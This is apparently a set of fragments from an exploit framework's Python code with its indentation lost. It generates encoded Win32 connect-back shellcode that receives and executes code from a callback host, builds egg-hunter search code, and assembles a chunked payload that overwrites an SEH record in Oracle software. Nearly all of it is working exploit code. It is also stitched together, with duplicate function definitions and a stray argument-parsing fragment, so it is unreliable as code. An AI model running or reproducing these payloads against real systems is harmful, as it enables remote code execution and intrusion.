def createShellcode(self):
localhost = self.callback.ip
localport = self.callback.port
from shellcode import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port": localport, "ipaddress": localhost})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
self.shellcode = sc.get()
from encoder import chunkedaddencoder
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
self.shellcode = self.tag2 + self.tag1 + self.shellcode
from shellcode import win32shell
self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
from encoder import addencoder
encoder = addencoder.inteladdencoder()
encoder.setbadstring(self.searchbadstring)
self.encodedsearchcode = encoder.encode(self.searchcode)
if not self.encodedsearchcode:
return None
self.log(
"Length of search shellcode: %d, length of real shellcode: %d\n" %
(len(self.searchcode), len(self.shellcode)))
return 1
def vscreateKnownWin32Shellcode(self,
badchars,
known,
host,
port,
subesp=0):
"""
Used from VS, badchars are received.
Creates a very small shellcode that is SP+Lang dependant
check the top of win32knownshellcodegenerator for valid values of known
"""
from shellcode.win32knownshellcodegenerator import win32Known
from encoder import addencoder
myobj = win32Known()
self.badstring = badchars
myobj.badstring = self.badstring
myobj.knownSP(known)
myobj.addAttr("findeipnoesp",
{"subespval": subesp}) #don't mess with eip
myobj.addAttr("smalltcpconnect", {"port": port, "ipaddress": host})
myobj.addAttr("smallrecv", None)
myobj.addAttr("NoExit", None)
#self.addAttr("initstackswap",None)
#self.addAttr("stackSwap",None)
ret = myobj.get()
#import encoder
encoder = addencoder.inteladdencoder()
encoder.setbadstring(self.badstring)
encodedshellcode = encoder.encode(ret)
self.shellcode = encodedshellcode
return
def getOracleChunk(self, retadd, seoffset, align):
pad = 1
orachunk = ""
chunk = ""
self.log("Building Oracle specific chunk")
if pad:
chunk += "%X\r\n" % pad
chunk += "P" * pad
chunk += "\r\n"
diff = len(chunk)
chunk += "FFFFFFF4"
orachunk = "A" * (8192 - (8 + 2 + diff))
# mix in searchcode for our main payload
self.log("Building searchcode")
searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
from encoder import addencoder
encoder = addencoder.inteladdencoder()
encoder.setbadstring(self.searchbadstring)
searchcode = encoder.encode(searchcode)
#searchcode = "\xcc" + searchcode
# mix it in the sauce
self.log("Adding searchcode")
orachunk = stroverwrite(orachunk, searchcode,
(((seoffset - 1) * 4) + align) -
len(searchcode))
# ebx points at the ptr to next SEH record that we own
# we abuse this by using a jmp ebx addy and putting a
# jmp in the SEH record ptr to jmp over the SE handler tag
# and into a jmp back to some search shellcode for our main
# payload
# ebx will point at SEH next ptr, we jmp over the SE handler tag
orachunk = stroverwrite(orachunk, "AA\xeb\x04",
((seoffset - 1) * 4) + align)
# the actual SE handler tag
orachunk = stroverwrite(orachunk, intel_order(retadd),
(seoffset * 4) + align)
# jmp to searchcode here (addl 0x600,%esp jmp %esp)
orachunk = stroverwrite(orachunk, "\x81\xc4\x00\x06\x00\x00\xff\xe4",
((seoffset + 1) * 4) + align)
"""
findme = 0x41424301
for i in range(0, 2044):
findme = self.sanitiseAdd(findme)
print "offset i: %d %.8X"% (i, findme)
orachunk = stroverwrite(orachunk, intel_order(findme), i * 4)
findme = findme + 1
"""
chunk += orachunk
return chunk
def createShellcode(self, localhost, localport):
self.log("Calling back to %s:%s" % (localhost, localport))
self.createWin32Shellcode(self.badstring, localhost, localport)
self.shellcode = self.tag2 + self.tag1 + self.shellcode
self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
encoder = addencoder.inteladdencoder()
encoder.setbadstring(self.badstring)
#we need to solve a little problem with esp being
#in our string by subtracting from esp
SUBESP5000 = binstring("81 ec") + intel_order(5000)
self.searchcode = SUBESP5000 + self.searchcode
self.encodedsearchcode = encoder.encode(self.searchcode)
if not self.encodedsearchcode:
return None
self.log(
"Length of search shellcode: %d, length of real shellcode: %d\n" %
(len(self.searchcode), len(self.shellcode)))
#print prettyprint(self.encodedsearchcode)
return 1
localhost = a
i += 1
if o in ["-d"]:
localport = a
i += 1
if o in ["-s"]:
app.setSSL(1)
if i < 4:
#print "Only got %d args"%i
usage()
rawshellcode = win32shell.getshellcode(localhost, localport)
#print "len rawshellcode = "+str(len(rawshellcode))
#set up the shellcode
encoder = addencoder.inteladdencoder()
#figuring out these can be a pain.
encoder.setbadstring("\x00\x6b\x2f\x20\x0a\x0d\xff\xe0")
print "Encoding shellcode. This may take a while."
shellcode = encoder.encode(rawshellcode)
print "encoder reports following key: 0x%8.8x" % (encoder.getKey())
print "Done encoding shellcode."
if shellcode == "":
print "Could not encode shellcode"
sys.exit(0)
#debug int
#shellcode="\xcc"+shellcode
app.setShellcode(shellcode)
app.setHost(target)
app.setPort(int(targetport))
